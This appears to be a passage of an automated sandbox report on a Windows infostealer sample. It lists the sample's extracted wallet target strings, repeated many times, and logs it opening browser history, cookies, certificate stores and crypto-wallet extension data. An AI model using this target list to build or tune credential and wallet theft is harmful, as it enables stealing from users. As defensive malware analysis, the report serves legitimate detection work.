Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2408418198.0000000000414000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2408418198.0000000000414000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2408418198.0000000000414000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2408418198.0000000000414000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2408418198.0000000000414000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2408418198.0000000000414000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2408418198.0000000000414000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2408418198.0000000000414000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2408418198.0000000000414000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2408418198.0000000000414000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2408418198.0000000000414000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2408418198.0000000000414000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-wal Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
